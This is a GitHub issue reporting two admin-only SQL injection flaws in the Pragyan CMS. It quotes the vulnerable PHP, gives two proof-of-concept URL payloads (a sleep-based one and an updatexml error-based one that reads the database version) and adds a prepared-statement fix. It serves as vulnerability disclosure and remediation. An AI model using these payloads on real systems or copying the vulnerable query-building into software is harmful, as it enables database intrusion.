
Found 2 SQL injection vulnerabilities #228

Closed
lnyzx opened this issue Sep 14, 2017 · 1 comment

lnyzx commented Sep 14, 2017

Both vulnerabilities require being logged in as admin.

First, in cms/admin.lib.php line 358:

```php
function admin($pageid, $userid) {
	if(isset($_GET['doaction']) && $_GET['doaction'] == 'getsuggestions' && isset($_GET['forwhat'])) {
		if(strlen($_GET['forwhat']) >= 3) {
			echo getSuggestions($_GET['forwhat']);
			disconnect();
			exit();
		}
	}
	// ... rest of admin() not quoted in the issue
```

function getSuggestions:

```php
function getSuggestions($pattern) {
	$suggestionsQuery = "SELECT IF(user_email LIKE \"$pattern%\", 1, " .
			"IF(`user_fullname` LIKE \"$pattern%\", 2, " .
			"IF(`user_fullname` LIKE \"% $pattern%\", 3, " .
			"IF(`user_email` LIKE \"%$pattern%\", 4, " .
			"IF(`user_fullname` LIKE \"%$pattern%\", 5, 6" .
			"))))) AS `relevance`,	`user_email`, `user_fullname` FROM `".MYSQL_DATABASE_PREFIX."users` WHERE `user_activated`=1 AND(`user_email` LIKE \"%$pattern%\" OR `user_fullname` LIKE \"%$pattern%\" ) ORDER BY `relevance`";
//			echo $suggestionsQuery;
	$suggestionsResult = mysqli_query($GLOBALS["___mysqli_ston"], $suggestionsQuery);

	$suggestions = array($pattern);

	while($suggestionsRow = mysqli_fetch_row($suggestionsResult)) {
		$suggestions[] = $suggestionsRow[1] . ' - ' . $suggestionsRow[2];
	}

	return join($suggestions, ',');
}
```

No filtering at all, so we can cause a boolean-based SQL injection. PoC:

```
pragyan/home/+admin&doaction=getsuggestions&forwhat="and sleep(10) and "admin" like "admin
```

The second one is in line 252:

```php
function delete_blacklist()
{
	$id = safe_html($_GET['del_black']);
	$query = "DELETE FROM `".MYSQL_DATABASE_PREFIX."blacklist` WHERE `id` = '$id'";
	$result =mysqli_query($GLOBALS["___mysqli_ston"], $query) or displayerror("Unable to Delete blacklist". ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)));
	if(mysqli_affected_rows($GLOBALS["___mysqli_ston"])>0)	
			displayinfo("Blackilist Deleted Successfully");
	return 1;
}
```

function safe_html():

```php
function safe_html($html)
{
	return htmlspecialchars(strip_tags($html));
}
```

htmlspecialchars() has nothing to do with SQL injection, so we can use error-based SQL injection. PoC:

```
pragyan/home/+admin&subaction=global&del_black=4'and updatexml(1,concat(0x7e,(select @@version),0x7e),1) and '1'='1
```
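For reference, here is how both functions quoted above look once the user input is sent as bound parameters instead of being concatenated into the query text. This is an added example, not Pragyan project code or a patch from this thread; it assumes the connection handle the project keeps in `$GLOBALS["___mysqli_ston"]`, the `MYSQL_DATABASE_PREFIX` constant, the table and column names shown in the issue, an integer `id` column on the blacklist table, and the project's `displayinfo()` helper. The helper names `escapeLikePattern`, `getSuggestionsSafe` and `deleteBlacklistSafe` are invented for the example.

```php
<?php
// Added example, not Pragyan project code: hardened replacements for the two
// functions quoted in this issue. Both use mysqli prepared statements so that
// request input travels as bound parameters and is never spliced into SQL text.
// Assumptions: the connection handle in $GLOBALS["___mysqli_ston"], the
// MYSQL_DATABASE_PREFIX constant, the table/column names from the issue, and an
// integer `id` column on the blacklist table.

// Binding a parameter stops it from breaking out of the string literal, but "%"
// and "_" still act as wildcards inside LIKE. Escape them so a user typing "%"
// does not match every row. MySQL's default LIKE escape character is "\".
function escapeLikePattern(string $value): string
{
    return str_replace(['\\', '%', '_'], ['\\\\', '\\%', '\\_'], $value);
}

function getSuggestionsSafe(mysqli $db, string $pattern): string
{
    $p         = escapeLikePattern($pattern);
    $prefix    = $p . '%';        // "pattern..."
    $wordStart = '% ' . $p . '%'; // "... pattern..." (later word, as in the original)
    $anywhere  = '%' . $p . '%';  // "...pattern..."

    // Same relevance ranking as the original query; every pattern is a placeholder.
    // The table name comes from a constant, not from the request, so it may be
    // concatenated.
    $sql = 'SELECT IF(`user_email` LIKE ?, 1,'
         . ' IF(`user_fullname` LIKE ?, 2,'
         . ' IF(`user_fullname` LIKE ?, 3,'
         . ' IF(`user_email` LIKE ?, 4,'
         . ' IF(`user_fullname` LIKE ?, 5, 6))))) AS `relevance`,'
         . ' `user_email`, `user_fullname`'
         . ' FROM `' . MYSQL_DATABASE_PREFIX . 'users`'
         . ' WHERE `user_activated` = 1'
         . ' AND (`user_email` LIKE ? OR `user_fullname` LIKE ?)'
         . ' ORDER BY `relevance`';

    $stmt = $db->prepare($sql);
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('sssssss',
        $prefix, $prefix, $wordStart, $anywhere, $anywhere, $anywhere, $anywhere);
    $stmt->execute();
    $stmt->bind_result($relevance, $email, $fullname);

    // Same output shape as the original: the typed pattern first, then matches.
    $suggestions = [$pattern];
    while ($stmt->fetch()) {
        $suggestions[] = $email . ' - ' . $fullname;
    }
    $stmt->close();
    return implode(',', $suggestions);
}

// Returns the number of rows deleted (0 when the id is malformed or unknown).
function deleteBlacklistSafe(mysqli $db, $rawId): int
{
    // Validate the shape first: an id is a non-negative integer, so anything
    // else (including an array from del_black[]=...) is rejected before it
    // reaches the database at all.
    if (!is_string($rawId) && !is_int($rawId)) {
        return 0;
    }
    if (!ctype_digit((string) $rawId)) {
        return 0;
    }
    $id = (int) $rawId;

    $stmt = $db->prepare(
        'DELETE FROM `' . MYSQL_DATABASE_PREFIX . 'blacklist` WHERE `id` = ?'
    );
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('i', $id);
    $stmt->execute();
    $deleted = $stmt->affected_rows;
    $stmt->close();
    return $deleted;
}

// Call sites mirroring the handlers in the issue. The admin permission check
// that surrounds them in the project is unchanged and not repeated here.
if (isset($_GET['doaction'], $_GET['forwhat'])
    && $_GET['doaction'] === 'getsuggestions'
    && is_string($_GET['forwhat'])
    && strlen($_GET['forwhat']) >= 3) {
    echo getSuggestionsSafe($GLOBALS['___mysqli_ston'], $_GET['forwhat']);
}
if (isset($_GET['del_black'])) {
    $n = deleteBlacklistSafe($GLOBALS['___mysqli_ston'], $_GET['del_black']);
    if ($n > 0) {
        displayinfo('Blacklist Deleted Successfully');
    }
}
```

Two points worth keeping in mind when reviewing a fix like this. `safe_html()` encodes for the HTML output context, and with the default flags `htmlspecialchars()` used before PHP 8.1 (`ENT_COMPAT`) it does not touch single quotes at all, so the quote in the second PoC reaches the query intact; even a version that did encode the quote would only be encoding for the wrong context. And while the maintainer is right that admin-only reachability lowers the exposure, prepared statements remove the injection regardless of who holds the session, which is the property you want from the data-access layer.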

@ssundarraj ssundarraj assigned ssundarraj and suhithr and unassigned ssundarraj Sep 15, 2017
ssundarraj (Member) commented:

@suhithr Find someone to fix this -- shouldn't be too tough. ("admin" permissions should only be given to trusted users so the risk shouldn't be too high.)

shravan97 added a commit to shravan97/pragyan that referenced this issue Oct 21, 2017
lnyzx closed this as completed Dec 4, 2017